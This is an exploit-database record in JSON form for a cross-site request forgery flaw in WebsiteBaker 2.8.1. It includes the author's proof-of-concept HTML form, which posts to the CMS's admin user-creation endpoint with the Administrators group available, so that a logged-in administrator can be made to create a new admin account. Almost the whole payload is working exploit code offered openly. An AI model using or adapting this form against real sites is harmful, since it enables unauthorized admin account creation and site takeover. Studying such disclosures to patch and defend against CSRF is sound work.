{"published": "2010-06-19T00:00:00", "id": "1337DAY-ID-12797", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-03-13T01:14:23", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-13T01:14:23", "rev": 2}, "vulnersScore": 0.1}, "type": "zdt", "lastseen": "2018-03-13T01:14:23", "edition": 2, "title": "WebsiteBaker 2.8.1 CSRF Vulnerability", "href": "https://0day.today/exploit/description/12797", "modified": "2010-06-19T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/12797", "references": [], "reporter": "Luis Santana", "sourceData": "=====================================\r\nWebsiteBaker 2.8.1 CSRF Vulnerability\r\n=====================================\r\n\r\n# Author: Luis Santana\r\n# Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667\r\n# Version: 2.8.1\r\n# Tested on: All\r\n\r\nRegards,\r\nLuis Santana\r\nAdmin - http://hacktalk.net\r\nHackTalk Security\r\n \r\n<h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1>\r\n<form name=\"user\"action=\"http://demo.opensourcecms.com/websitebaker/admin/users/add.php\" method=\"post\" class=\"\">\r\n<input type=\"hidden\" name=\"user_id\" value=\"\" />\r\n<input type=\"hidden\" name=\"username_fieldname\" value=\"username_08y7h65u\" />\r\n \r\n<table cellpadding=\"5\" cellspacing=\"0\" border=\"0\" width=\"100%\">\r\n<tr>\r\n<td width=\"150\">Username:</td>\r\n<td class=\"value_input\">\r\n<input type=\"text\" name=\"username_08y7h65u\" maxlength=\"30\" value=\"\" />\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Password:</td>\r\n \r\n<td class=\"value_input\">\r\n<input type=\"password\" name=\"password\" maxlength=\"30\" />\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Re-type Password:</td>\r\n<td class=\"value_input\">\r\n<input type=\"password\" name=\"password2\" maxlength=\"30\" />\r\n</td>\r\n \r\n</tr>\r\n<tr style=\"display:none;\">\r\n<td> </td>\r\n<td style=\"font-size: 10px;\">\r\nPlease note: You should only enter values in the above fields if you wish to change this users password\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Display Name:</td>\r\n<td class=\"value_input\">\r\n<input type=\"text\" name=\"display_name\" maxlength=\"255\" value=\"\" />\r\n \r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Email:</td>\r\n<td class=\"value_input\">\r\n<input type=\"text\" name=\"email\" maxlength=\"255\" value=\"\" />\r\n</td>\r\n</tr>\r\n<tr style=\"\">\r\n<td>Home Folder:</td>\r\n \r\n<td class=\"value_input\">\r\n<select name=\"home_folder\">\r\n<option value=\"\">None</option>\r\n \r\n<option value=\"/testbild\" >/media/testbild</option>\r\n</select>\r\n</td>\r\n</tr>\r\n<tr>\r\n \r\n<td>Group:</td>\r\n<td class=\"value_input\">\r\n<select name=\"groups[]\" multiple=\"multiple\" size=\"5\">\r\n \r\n<option value=\"1\" >Administrators</option>\r\n</select>\r\n</td>\r\n</tr>\r\n<tr>\r\n \r\n<td> </td>\r\n<td>\r\n<input type=\"radio\" name=\"active[]\" id=\"active\" value=\"1\" checked=\"checked\" />\r\n<label for=\"active\">Active</label>\r\n<input type=\"radio\" name=\"active[]\" id=\"disabled\" value=\"0\" />\r\n<label for=\"disabled\">Disabled</label>\r\n</td>\r\n</tr>\r\n \r\n<tr>\r\n<td> </td>\r\n<td>\r\n<input type=\"submit\" name=\"submit\" value=\"Add\" />\r\n<input type=\"reset\" name=\"reset\" value=\"Reset\" />\r\n</td>\r\n</tr>\r\n</table>\r\n \r\n</form>\r\n \r\n \r\n<p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p>\r\n\r\n\n\n# 0day.today [2018-03-12] #"}

{}